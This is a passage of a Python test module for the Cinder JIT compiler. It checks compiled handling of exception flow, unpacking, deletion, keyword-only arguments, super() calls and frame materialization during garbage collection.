        for i in range(niters):
            try:
                try:
                    f(i)
                except Err2:
                    pass
            except Err1:
                break
        return i

    def test_try_except_in_loop(self):
        def f(i):
            if i == 10:
                raise Err1("hello")

        self.assertEqual(self.try_except_in_loop(20, f), 10)

    @unittest.failUnlessJITCompiled
    def nested_try_except(self, f):
        # Three levels of handlers; inner two re-raise, outermost recovers.
        try:
            try:
                try:
                    f()
                except:
                    raise
            except:
                raise
        except:
            return 100

    def test_nested_try_except(self):
        def f():
            raise Exception("hello")

        self.assertEqual(self.nested_try_except(f), 100)

    @unittest.failUnlessJITCompiled
    def try_except_in_generator(self, f):
        # Yields inside a try body; the handler itself also yields.
        try:
            yield f(0)
            yield f(1)
            yield f(2)
        except:
            yield 123

    def test_except_in_generator(self):
        def f(i):
            if i == 1:
                raise Exception("hello")
            return

        g = self.try_except_in_generator(f)
        next(g)
        self.assertEqual(next(g), 123)

    @unittest.failUnlessJITCompiled
    def try_finally(self, should_raise):
        # finally runs on both paths; the raise still propagates to the caller.
        result = None
        try:
            if should_raise:
                raise Exception("testing 123")
        finally:
            result = 100
        return result

    def test_try_finally(self):
        self.assertEqual(self.try_finally(False), 100)
        with self.assertRaisesRegex(Exception, "testing 123"):
            self.try_finally(True)

    @unittest.failUnlessJITCompiled
    def try_except_finally(self, should_raise):
        result = None
        try:
            if should_raise:
                raise Exception("testing 123")
        except Exception:
            result = 200
        finally:
            if result is None:
                result = 100
        return result

    def test_try_except_finally(self):
        self.assertEqual(self.try_except_finally(False), 100)
        self.assertEqual(self.try_except_finally(True), 200)

    # The next four methods test `return` inside `finally`, which discards any
    # in-flight return value or exception.

    @unittest.failUnlessJITCompiled
    def return_in_finally(self, v):
        try:
            pass
        finally:
            return v

    @unittest.failUnlessJITCompiled
    def return_in_finally2(self, v):
        # The finally's return wins over the try's return.
        try:
            return v
        finally:
            return 100

    @unittest.failUnlessJITCompiled
    def return_in_finally3(self, v):
        # The finally's return swallows the ZeroDivisionError.
        try:
            1 / 0
        finally:
            return v

    @unittest.failUnlessJITCompiled
    def return_in_finally4(self, v):
        # Nested finally: the innermost return wins and swallows the error.
        try:
            return 100
        finally:
            try:
                1 / 0
            finally:
                return v

    def test_return_in_finally(self):
        self.assertEqual(self.return_in_finally(100), 100)
        self.assertEqual(self.return_in_finally2(200), 100)
        self.assertEqual(self.return_in_finally3(300), 300)
        self.assertEqual(self.return_in_finally4(400), 400)

    @unittest.failUnlessJITCompiled
    def break_in_finally_after_return(self, x):
        # `break` in finally cancels the pending return and exits the loop.
        for count in [0, 1]:
            count2 = 0
            while count2 < 20:
                count2 += 10
                try:
                    return count + count2
                finally:
                    if x:
                        break
        return "end", count, count2

    @unittest.failUnlessJITCompiled
    def break_in_finally_after_return2(self, x):
        for count in [0, 1]:
            for count2 in [10, 20]:
                try:
                    return count + count2
                finally:
                    if x:
                        break
        return "end", count, count2

    def test_break_in_finally_after_return(self):
        self.assertEqual(self.break_in_finally_after_return(False), 10)
        self.assertEqual(self.break_in_finally_after_return(True), ("end", 1, 10))
        self.assertEqual(self.break_in_finally_after_return2(False), 10)
        self.assertEqual(self.break_in_finally_after_return2(True), ("end", 1, 10))

    @unittest.failUnlessJITCompiled
    def continue_in_finally_after_return(self, x):
        # `continue` in finally cancels the pending return and resumes the loop.
        count = 0
        while count < 100:
            count += 1
            try:
                return count
            finally:
                if x:
                    continue
        return "end", count

    @unittest.failUnlessJITCompiled
    def continue_in_finally_after_return2(self, x):
        for count in [0, 1]:
            try:
                return count
            finally:
                if x:
                    continue
        return "end", count

    def test_continue_in_finally_after_return(self):
        self.assertEqual(self.continue_in_finally_after_return(False), 1)
        self.assertEqual(self.continue_in_finally_after_return(True), ("end", 100))
        self.assertEqual(self.continue_in_finally_after_return2(False), 0)
        self.assertEqual(self.continue_in_finally_after_return2(True), ("end", 1))

    @unittest.failUnlessJITCompiled
    def return_in_loop_in_finally(self, x):
        # A return from inside a loop nested in a try with a trivial finally.
        try:
            for _ in [1, 2, 3]:
                if x:
                    return x
        finally:
            pass
        return 100

    def test_return_in_loop_in_finally(self):
        self.assertEqual(self.return_in_loop_in_finally(True), True)
        self.assertEqual(self.return_in_loop_in_finally(False), 100)

    @unittest.failUnlessJITCompiled
    def conditional_return_in_finally(self, x, y, z):
        try:
            if x:
                return x
            if y:
                return y
        finally:
            pass
        return z

    def test_conditional_return_in_finally(self):
        self.assertEqual(self.conditional_return_in_finally(100, False, False), 100)
        self.assertEqual(self.conditional_return_in_finally(False, 200, False), 200)
        self.assertEqual(self.conditional_return_in_finally(False, False, 300), 300)

    @unittest.failUnlessJITCompiled
    def nested_finally(self, x):
        # A try/finally inside another finally block.
        try:
            if x:
                return x
        finally:
            try:
                y = 10
            finally:
                z = y
        return z

    def test_nested_finally(self):
        self.assertEqual(self.nested_finally(100), 100)
        self.assertEqual(self.nested_finally(False), 10)
class UnpackSequenceTests(unittest.TestCase):
    """Exercises JIT compilation of UNPACK_SEQUENCE / UNPACK_EX bytecodes.

    Several tests deopt into the interpreter (wrong-size tuples, lists,
    generators), hence the skip-under-no-frame-mode decorators.
    """

    @unittest.failUnlessJITCompiled
    def _unpack_arg(self, seq, which):
        # Exact 4-element unpack (UNPACK_SEQUENCE).
        a, b, c, d = seq
        if which == "a":
            return a
        if which == "b":
            return b
        if which == "c":
            return c
        return d

    @unittest.failUnlessJITCompiled
    def _unpack_ex_arg(self, seq, which):
        # Starred unpack (UNPACK_EX); c absorbs the middle of the sequence.
        a, b, *c, d = seq
        if which == "a":
            return a
        if which == "b":
            return b
        if which == "c":
            return c
        return d

    def test_unpack_tuple(self):
        self.assertEqual(self._unpack_arg(("eh", "bee", "see", "dee"), "b"), "bee")
        self.assertEqual(self._unpack_arg((3, 2, 1, 0), "c"), 1)

    @unittest.skipUnderCinderJITNotFullFrame("deopt not supported in no-frame mode")
    def test_unpack_tuple_wrong_size(self):
        with self.assertRaises(ValueError):
            self._unpack_arg((1, 2, 3, 4, 5), "a")

    @unittest.skipUnderCinderJITNotFullFrame("deopt not supported in no-frame mode")
    def test_unpack_list(self):
        self.assertEqual(self._unpack_arg(["one", "two", "three", "four"], "a"), "one")

    @unittest.skipUnderCinderJITNotFullFrame("deopt not supported in no-frame mode")
    def test_unpack_gen(self):
        def gen():
            yield "first"
            yield "second"
            yield "third"
            yield "fourth"

        self.assertEqual(self._unpack_arg(gen(), "d"), "fourth")

    @unittest.failUnlessJITCompiled
    def _unpack_not_iterable(self):
        # Unpacking a non-iterable must raise TypeError.
        (a, b, *c) = 1

    @unittest.failUnlessJITCompiled
    def _unpack_insufficient_values(self):
        # Too few values before the star must raise ValueError.
        (a, b, *c) = [1]

    @unittest.failUnlessJITCompiled
    def _unpack_insufficient_values_after(self):
        # Too few values after the star must raise ValueError.
        (a, *b, c, d) = [1, 2]

    @unittest.skipUnderCinderJITNotFullFrame("deopt not supported in no-frame mode")
    def test_unpack_ex(self):
        with self.assertRaises(TypeError):
            self._unpack_not_iterable()
        with self.assertRaises(ValueError):
            self._unpack_insufficient_values()
        with self.assertRaises(ValueError):
            self._unpack_insufficient_values_after()
        seq = [1, 2, 3, 4, 5, 6]
        self.assertEqual(self._unpack_ex_arg(seq, "a"), 1)
        self.assertEqual(self._unpack_ex_arg(seq, "b"), 2)
        self.assertEqual(self._unpack_ex_arg(seq, "c"), [3, 4, 5])
        self.assertEqual(self._unpack_ex_arg(seq, "d"), 6)
class DeleteSubscrTests(unittest.TestCase):
    """Exercises JIT compilation of DELETE_SUBSCR (`del container[key]`)."""

    @unittest.failUnlessJITCompiled
    def _delit(self, container, key):
        del container[key]

    def test_builtin_types(self):
        l = [1, 2, 3]
        self._delit(l, 1)
        self.assertEqual(l, [1, 3])
        d = {"foo": 1, "bar": 2}
        self._delit(d, "foo")
        self.assertEqual(d, {"bar": 2})

    def test_custom_type(self):
        # A user-defined __delitem__ records the key instead of deleting.
        class CustomContainer:
            def __init__(self):
                self.item = None

            def __delitem__(self, item):
                self.item = item

        c = CustomContainer()
        self._delit(c, "foo")
        self.assertEqual(c.item, "foo")

    def test_missing_key(self):
        d = {"foo": 1}
        with self.assertRaises(KeyError):
            self._delit(d, "bar")

    def test_custom_error(self):
        # Exceptions raised by __delitem__ must propagate through the JIT.
        class CustomContainer:
            def __delitem__(self, item):
                raise Exception("testing 123")

        c = CustomContainer()
        with self.assertRaisesRegex(Exception, "testing 123"):
            self._delit(c, "foo")
class DeleteFastTests(unittest.TestCase):
    """Exercises JIT compilation of DELETE_FAST (`del local`).

    Reading a deleted local raises NameError (UnboundLocalError); the `as e`
    binding in the except handlers is implicitly deleted at handler exit.
    """

    @unittest.failUnlessJITCompiled
    def _del(self):
        x = 2
        del x

    @unittest.failUnlessJITCompiled
    def _del_arg(self, a):
        del a

    @unittest.failUnlessJITCompiled
    def _del_and_raise(self):
        # Reading x after `del x` must raise NameError.
        x = 2
        del x
        return x

    @unittest.failUnlessJITCompiled
    def _del_arg_and_raise(self, a):
        del a
        return a

    @unittest.failUnlessJITCompiled
    def _del_ex_no_raise(self):
        # `e` is intentionally unused: the implicit deletion of the except
        # binding is the behavior under test.
        try:
            return min(1, 2)
        except Exception as e:
            pass

    @unittest.failUnlessJITCompiled
    def _del_ex_raise(self):
        # `e` is unbound after the handler exits, so `return e` raises NameError.
        try:
            raise Exception()
        except Exception as e:
            pass
        return e

    def test_del_local(self):
        self.assertEqual(self._del(), None)

    def test_del_arg(self):
        self.assertEqual(self._del_arg(42), None)

    def test_del_and_raise(self):
        with self.assertRaises(NameError):
            self._del_and_raise()

    def test_del_arg_and_raise(self):
        with self.assertRaises(NameError):
            self.assertEqual(self._del_arg_and_raise(42), None)

    def test_del_ex_no_raise(self):
        self.assertEqual(self._del_ex_no_raise(), 1)

    def test_del_ex_raise(self):
        with self.assertRaises(NameError):
            self.assertEqual(self._del_ex_raise(), 42)
class KeywordOnlyArgTests(unittest.TestCase):
    """Exercises JIT handling of keyword-only parameters, with and without
    kwdefaults, and combined with **kwargs."""

    @unittest.failUnlessJITCompiled
    def f1(self, *, val=10):
        return val

    @unittest.failUnlessJITCompiled
    def f2(self, which, *, y=10, z=20):
        # Both keyword-only params have defaults.
        if which == 0:
            return y
        elif which == 1:
            return z
        return which

    @unittest.failUnlessJITCompiled
    def f3(self, which, *, y, z=20):
        # `y` is required; `z` has a default.
        if which == 0:
            return y
        elif which == 1:
            return z
        return which

    @unittest.failUnlessJITCompiled
    def f4(self, which, *, y, z=20, **kwargs):
        # Keyword-only params plus a variable-keyword catch-all.
        if which == 0:
            return y
        elif which == 1:
            return z
        elif which == 2:
            return kwargs
        return which

    def test_kwonly_arg_passed_as_positional(self):
        msg = "takes 1 positional argument but 2 were given"
        with self.assertRaisesRegex(TypeError, msg):
            self.f1(100)
        msg = "takes 2 positional arguments but 3 were given"
        with self.assertRaisesRegex(TypeError, msg):
            self.f3(0, 1)

    def test_kwonly_args_with_kwdefaults(self):
        self.assertEqual(self.f1(), 10)
        self.assertEqual(self.f1(val=20), 20)
        self.assertEqual(self.f2(0), 10)
        self.assertEqual(self.f2(0, y=20), 20)
        self.assertEqual(self.f2(1), 20)
        self.assertEqual(self.f2(1, z=30), 30)

    def test_kwonly_args_without_kwdefaults(self):
        self.assertEqual(self.f3(0, y=10), 10)
        self.assertEqual(self.f3(1, y=10), 20)
        self.assertEqual(self.f3(1, y=10, z=30), 30)

    def test_kwonly_args_and_varkwargs(self):
        self.assertEqual(self.f4(0, y=10), 10)
        self.assertEqual(self.f4(1, y=10), 20)
        self.assertEqual(self.f4(1, y=10, z=30, a=40), 30)
        self.assertEqual(self.f4(2, y=10, z=30, a=40, b=50), {"a": 40, "b": 50})
class ClassA:
    """Base class for the super()-access tests: supplies the attributes and
    methods that ClassB reaches through super()."""

    # Class attributes read via super() in ClassB's properties.
    z = 100
    x = 41

    def g(self, a):
        """Offset the argument by 42 (called via super().g from ClassB)."""
        return a + 42

    @classmethod
    def cls_g(cls, a):
        """Offset the argument by 100 (called via super().cls_g from ClassB)."""
        return a + 100
class ClassB(ClassA):
    """Derived class exercising both zero-arg super() and the explicit
    two-arg super(ClassB, ...) form, for methods, classmethods, and
    properties. The two forms are kept deliberately distinct."""

    def f(self, a):
        return super().g(a=a)

    def f_2arg(self, a):
        return super(ClassB, self).g(a=a)

    @classmethod
    def cls_f(cls, a):
        return super().cls_g(a=a)

    @classmethod
    def cls_f_2arg(cls, a):
        return super(ClassB, cls).cls_g(a=a)

    @property
    def x(self):
        # Reads the base class attribute (41) through super() and adds 1.
        return super().x + 1

    @property
    def x_2arg(self):
        return super(ClassB, self).x + 1
class SuperAccessTest(unittest.TestCase):
    """Tests super() method/attribute access; the test methods themselves are
    JIT-compiled so the super() call sites run under the JIT."""

    @unittest.failUnlessJITCompiled
    def test_super_method(self):
        self.assertEqual(ClassB().f(1), 43)
        self.assertEqual(ClassB().f_2arg(1), 43)
        self.assertEqual(ClassB.cls_f(99), 199)
        self.assertEqual(ClassB.cls_f_2arg(99), 199)

    @unittest.failUnlessJITCompiled
    def test_super_method_kwarg(self):
        self.assertEqual(ClassB().f(1), 43)
        self.assertEqual(ClassB().f_2arg(1), 43)
        self.assertEqual(ClassB.cls_f(1), 101)
        self.assertEqual(ClassB.cls_f_2arg(1), 101)

    @unittest.failUnlessJITCompiled
    def test_super_attr(self):
        self.assertEqual(ClassB().x, 42)
        self.assertEqual(ClassB().x_2arg, 42)
class RegressionTests(StaticTestBase):
    # Detects an issue in the backend where the Store instruction generated 32-
    # bit memory writes for 64-bit constants.
    def test_store_of_64bit_immediates(self):
        codestr = f"""
            from __static__ import int64, box

            class Cint64:
                def __init__(self):
                    self.a: int64 = 0x5555555555555555

            def testfunc():
                c = Cint64()
                c.a = 2
                return box(c.a) == 2
        """
        with self.in_module(codestr) as mod:
            testfunc = mod.testfunc
            # 0x5555... alternates bits, so a truncated 32-bit store of the
            # constant would corrupt the field and break the comparison.
            self.assertTrue(testfunc())
            if cinderjit:
                self.assertTrue(cinderjit.is_jit_compiled(testfunc))
@unittest.skipUnlessCinderJITEnabled("Requires cinderjit module")
class CinderJitModuleTests(StaticTestBase):
    """Tests for the public API of the cinderjit module itself."""

    def test_bad_disable(self):
        # disable() rejects extra positional args and non-default argument values.
        with self.assertRaises(TypeError):
            cinderjit.disable(1, 2)
        with self.assertRaises(TypeError):
            cinderjit.disable(None)

    def test_jit_force_normal_frame_changes_flags(self):
        def x():
            pass

        self.assertEqual(x.__code__.co_flags & CO_NORMAL_FRAME, 0)
        forced_x = cinderjit.jit_force_normal_frame(x)
        # Fix: assert on the function returned by jit_force_normal_frame.
        # The previous assertion re-read `x.__code__`, leaving `forced_x`
        # unused and making the check vacuous.
        self.assertEqual(forced_x.__code__.co_flags & CO_NORMAL_FRAME, CO_NORMAL_FRAME)

    def test_jit_force_normal_frame_raises_on_invalid_arg(self):
        with self.assertRaises(TypeError):
            cinderjit.jit_force_normal_frame(None)

    def test_jit_suppress(self):
        @cinderjit.jit_suppress
        def x():
            pass

        self.assertEqual(x.__code__.co_flags & CO_SUPPRESS_JIT, CO_SUPPRESS_JIT)

    def test_jit_suppress_static(self):
        codestr = f"""
            import cinderjit

            @cinderjit.jit_suppress
            def f():
                return True

            def g():
                return True
        """
        with self.in_module(codestr) as mod:
            f = mod.f
            g = mod.g
            self.assertTrue(f())
            self.assertTrue(g())
            # Only the decorated function is excluded from JIT compilation.
            self.assertFalse(cinderjit.is_jit_compiled(f))
            self.assertTrue(cinderjit.is_jit_compiled(g))
# Deliberately interpreted (jit_suppress) callee with **kwargs, used by
# GetFrameTests.test_frame_allocation_race to reach the interpreter's
# PyEval_EvalCodeWithName kwargs-dict allocation path.
@jit_suppress
def _inner(*args, **kwargs):
    return kwargs
# JIT-compiled caller that forwards *args/**kwargs to the interpreted _inner;
# the star-call shape routes through JITRT_CallFunctionEx (see the race test).
@unittest.failUnlessJITCompiled
def _outer(args, kwargs):
    return _inner(*args, **kwargs)
class GetFrameInFinalizer:
    # Calling sys._getframe() in a finalizer materializes the Python stack;
    # used via _create_getframe_cycle to trigger materialization during GC.
    def __del__(self):
        sys._getframe()
def _create_getframe_cycle():
    """Build cyclic garbage whose collection materializes the Python stack.

    The returned dict participates in a reference cycle and holds a
    GetFrameInFinalizer, whose __del__ calls sys._getframe() when the GC
    eventually collects the cycle.
    """
    outer = {"fg": GetFrameInFinalizer()}
    outer["b"] = {"a": outer}
    return outer
class TestException(Exception):
    # Sentinel exception type for the generator-throw frame tests below.
    pass
class GetFrameTests(unittest.TestCase):
    """Tests frame materialization via sys._getframe() under the JIT.

    f1 -> f2 -> f3 build a known JIT-compiled call stack, then `leaf` does
    something that materializes or walks frames; assert_frames checks the
    resulting f_back chain by code-object name.
    """

    @unittest.failUnlessJITCompiled
    def f1(self, leaf):
        return self.f2(leaf)

    @unittest.failUnlessJITCompiled
    def f2(self, leaf):
        return self.f3(leaf)

    @unittest.failUnlessJITCompiled
    def f3(self, leaf):
        return leaf()

    def assert_frames(self, frame, names):
        # Walk frame.f_back and verify each frame's code-object name in order.
        for name in names:
            self.assertEqual(frame.f_code.co_name, name)
            frame = frame.f_back

    @unittest.failUnlessJITCompiled
    def simple_getframe(self):
        return sys._getframe()

    def test_simple_getframe(self):
        stack = ["simple_getframe", "f3", "f2", "f1", "test_simple_getframe"]
        frame = self.f1(self.simple_getframe)
        self.assert_frames(frame, stack)

    @unittest.failUnlessJITCompiled
    def consecutive_getframe(self):
        f1 = sys._getframe()
        f2 = sys._getframe()
        return f1, f2

    def test_consecutive_getframe(self):
        stack = ["consecutive_getframe", "f3", "f2", "f1", "test_consecutive_getframe"]
        frame1, frame2 = self.f1(self.consecutive_getframe)
        self.assert_frames(frame1, stack)
        # Make sure the second call to sys._getframe doesn't rematerialize
        # frames
        for _ in range(4):
            self.assertTrue(frame1 is frame2)
            frame1 = frame1.f_back
            frame2 = frame2.f_back

    @unittest.failUnlessJITCompiled
    def getframe_then_deopt(self):
        # Materialize first, then deopt via raise/except.
        f = sys._getframe()
        try:
            raise Exception("testing 123")
        except:
            return f

    def test_getframe_then_deopt(self):
        # Make sure we correctly unlink a materialized frame after its function
        # deopts into the interpreter
        stack = ["getframe_then_deopt", "f3", "f2", "f1", "test_getframe_then_deopt"]
        frame = self.f1(self.getframe_then_deopt)
        self.assert_frames(frame, stack)

    @unittest.failUnlessJITCompiled
    def getframe_in_except(self):
        # Materialize only after deopting into the exception handler.
        try:
            raise Exception("testing 123")
        except:
            return sys._getframe()

    def test_getframe_after_deopt(self):
        stack = ["getframe_in_except", "f3", "f2", "f1", "test_getframe_after_deopt"]
        frame = self.f1(self.getframe_in_except)
        self.assert_frames(frame, stack)

    class FrameGetter:
        # Finalizer that captures the current frame into the shared box.
        def __init__(self, box):
            self.box = box

        def __del__(self):
            self.box[0] = sys._getframe()

    def do_raise(self, x):
        # Clear reference held by frame in the traceback that gets created with
        # the exception
        del x
        raise Exception("testing 123")

    @unittest.failUnlessJITCompiled
    def getframe_in_dtor_during_deopt(self):
        ref = ["notaframe"]
        try:
            self.do_raise(self.FrameGetter(ref))
        except:
            return ref[0]

    def test_getframe_in_dtor_during_deopt(self):
        # Test that we can correctly walk the stack in the middle of deopting
        frame = self.f1(self.getframe_in_dtor_during_deopt)
        stack = [
            "__del__",
            "getframe_in_dtor_during_deopt",
            "f3",
            "f2",
            "f1",
            "test_getframe_in_dtor_during_deopt",
        ]
        self.assert_frames(frame, stack)

    @unittest.failUnlessJITCompiled
    def getframe_in_dtor_after_deopt(self):
        ref = ["notaframe"]
        # frame_getter is intentionally kept alive until function exit; its
        # destructor then runs while we're still in the interpreter post-deopt.
        frame_getter = self.FrameGetter(ref)
        try:
            raise Exception("testing 123")
        except:
            return ref

    def test_getframe_in_dtor_after_deopt(self):
        # Test that we can correctly walk the stack in the interpreter after
        # deopting but before returning to the caller
        frame = self.f1(self.getframe_in_dtor_after_deopt)[0]
        stack = ["__del__", "f3", "f2", "f1", "test_getframe_in_dtor_after_deopt"]
        self.assert_frames(frame, stack)

    @jit_suppress
    def test_frame_allocation_race(self):
        # This test exercises a race condition that can occur in the
        # interpreted function prologue between when its frame is
        # allocated and when its set as `tstate->frame`.
        #
        # When a frame is allocated its f_back field is set to point to
        # tstate->frame. Shortly thereafter, tstate->frame is set to the
        # newly allocated frame by the interpreter loop. There is an implicit
        # assumption that tstate->frame will not change between when the
        # frame is allocated and when it is set to tstate->frame. That
        # assumption is invalid when the JIT is executing in shadow-frame mode.
        #
        # tstate->frame may change if the Python stack is materialized between
        # when the new frame is allocated and when its set as
        # tstate->frame. The window of time is very small, but it's
        # possible. We must ensure that if tstate->frame changes, the newly
        # allocated frame's f_back is updated to point to it. Otherwise, we can
        # end up with a missing frame on the Python stack. To see why, consider
        # the following scenario.
        #
        # Terms:
        #
        # - shadow stack - The call stack of _PyShadowFrame objects beginning
        #   at tstate->shadow_frame.
        # - pyframe stack - The call stack of PyFrameObject objects beginning
        #   at tstate->frame.
        #
        # T0:
        #
        # At time T0, the stacks look like:
        #
        #   Shadow Stack     PyFrame Stack
        #   ------------     ------------
        #   f0               f0
        #   f1
        #
        # - f0 is interpreted and has called f2.
        # - f1 is jit-compiled and is running in shadow-frame mode. The stack
        #   hasn't been materialized, so there is no entry for f1 on the
        #   PyFrame stack.
        #
        # T1:
        #
        # At time T1, f1 calls f2. f2 is interpreted and has a variable keyword
        # parameter (**kwargs). The call to f2 enters PyEval_EvalCodeWithName.
        # PyEval_EvalCodeWithName allocates a new PyFrameObject, p, to run
        # f2. At this point the stacks still look the same, however, notice
        # that p->f_back points to f0, not f1.
        #
        #   Shadow Stack     PyFrame Stack
        #   ------------     ------------
        #   f0               f0   <--- p->f_back points to f0
        #   f1
        #
        # T2:
        #
        # At time T2, PyEval_EvalCodeWithName has allocated the PyFrameObject,
        # p, for f2, and allocates a new dictionary for the variable keyword
        # parameter. The dictionary allocation triggers GC. During GC an object
        # is collected with a finalizer that materializes the stack. The most
        # common way for this to happen is through an unawaited coroutine. The
        # coroutine's finalizer will call _PyErr_WarnUnawaitedCoroutine which
        # materializes the stack.
        #
        # Notice that the stacks match after materialization, however,
        # p->f_back still points to f0.
        #
        #   Shadow Stack     PyFrame Stack
        #   ------------     ------------
        #   f0               f0   <--- p->f_back points to f0
        #   f1               f1
        #
        # T3:
        #
        # At time T3, control has transferred from PyEval_EvalCodeWithName
        # to the interpreter loop. The interpreter loop has set tstate->frame
        # to the frame it was passed, p. Now the stacks are mismatched:
        #
        #   Shadow Stack     PyFrame Stack
        #   ------------     ------------
        #   f0               f0
        #   f1               f2
        #   f2
        #
        # T4:
        #
        # At time T4, f2 finishes execution and returns into f1.
        #
        #   Shadow Stack     PyFrame Stack
        #   ------------     ------------
        #   f0               f0
        #   f1
        #
        # T5:
        #
        # At time T5, f1 finishes executing and attempts to return. Since the
        # stack was materialized, it expects to find a PyFrameObject for
        # f1 at the top of the PyFrame stack and aborts when it does not.
        #
        # The test below exercises this scenario.
        thresholds = gc.get_threshold()
        # Initialize zombie frame for _inner (called by _outer). The zombie
        # frame will be used the next time _inner is called. This avoids a
        # trip to the allocator that could trigger GC.
        args = []
        kwargs = {"foo": 1}
        _outer(args, kwargs)
        # Reset counts to zero. This allows us to set a threshold for
        # the first generation that will trigger collection when the keyword
        # dictionary is allocated in PyEval_EvalCodeWithName.
        gc.collect()
        # Create cyclic garbage that will materialize the Python stack when
        # it is collected
        _create_getframe_cycle()
        try:
            # JITRT_CallFunctionEx constructs a new keyword dictionary and args
            # tuple. PyEval_EvalCodeWithName does as well.
            gc.set_threshold(4)
            _outer(args, kwargs)
        finally:
            gc.set_threshold(*thresholds)
class GetGenFrameDuringThrowTest(unittest.TestCase):
    """Tests accessing a coroutine's cr_frame while an exception is being
    thrown into it (the inner coroutine touches the outer's frame mid-throw)."""

    def setUp(self) -> None:
        loop = asyncio.new_event_loop()
        asyncio.set_event_loop(loop)
        self.loop = loop

    def tearDown(self):
        self.loop.close()
        asyncio.set_event_loop_policy(None)

    @unittest.failUnlessJITCompiled
    async def outer_propagates_exc(self, inner):
        return await inner

    @unittest.failUnlessJITCompiled
    async def outer_handles_exc(self, inner):
        try:
            await inner
        except TestException:
            return 123

    async def inner(self, fut, outer_box):
        try:
            await fut
        except TestException:
            # Touch the outer coroutine's frame while its throw is in flight;
            # this forces frame materialization mid-throw.
            outer_coro = outer_box[0]
            outer_coro.cr_frame
            raise

    def run_test(self, outer_func):
        box = [None]
        fut = asyncio.Future()
        inner = self.inner(fut, box)
        outer = outer_func(inner)
        box[0] = outer
        outer.send(None)
        return outer.throw(TestException())

    def test_unhandled_exc(self):
        with self.assertRaises(TestException):
            self.run_test(self.outer_propagates_exc)

    def test_handled_exc(self):
        # The handled exception completes the coroutine, surfacing its return
        # value (123) via StopIteration.
        with self.assertRaises(StopIteration) as cm:
            self.run_test(self.outer_handles_exc)
        self.assertEqual(cm.exception.value, 123)
class DeleteAttrTests(unittest.TestCase):
    """`del obj.attr` behavior: plain instance attributes and read-only
    properties."""

    def test_delete_attr(self):
        class Holder:
            pass

        obj = Holder()
        obj.foo = "bar"
        self.assertEqual(obj.foo, "bar")
        del obj.foo
        # After deletion, reading the attribute raises AttributeError.
        with self.assertRaises(AttributeError):
            obj.foo

    def test_delete_attr_raises(self):
        class ReadOnly:
            @property
            def foo(self):
                return "hi"

        obj = ReadOnly()
        self.assertEqual(obj.foo, "hi")
        # A property with no deleter rejects `del`.
        with self.assertRaises(AttributeError):
            del obj.foo
_cmp_key = cmp_to_key(lambda x, y: 0)
class OtherTests(unittest.TestCase):
    def test_type_ready(self):
        # T100786119: type(_cmp_key) should have been initialized, or JIT
        # will fail during compilation.
        self.cmp_key = _cmp_key
# Allow running this test module directly.
if __name__ == "__main__":
    unittest.main()
# NOTE: trailing dataset-viewer page residue ("Subsets and Splits" footer text,
# including a stray "|") removed -- it was not part of the original test module
# and is not valid Python.